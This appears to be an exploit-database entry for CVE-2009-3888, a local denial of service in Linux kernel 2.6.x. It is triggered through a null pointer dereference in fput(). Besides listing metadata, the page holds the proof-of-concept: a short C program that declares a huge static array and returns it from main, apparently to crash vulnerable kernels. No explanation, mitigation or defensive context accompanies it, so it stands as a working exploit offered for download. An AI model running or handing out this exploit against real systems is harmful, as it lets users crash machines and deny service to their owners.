Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service



EKU-ID: 17685 CVE: CVE-2009-3888 OSVDB-ID:
Author: David Howells Published: 2009-11-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


int main()
{
static long long a[1024 * 1024 * 20] = { 0 };

return a;

}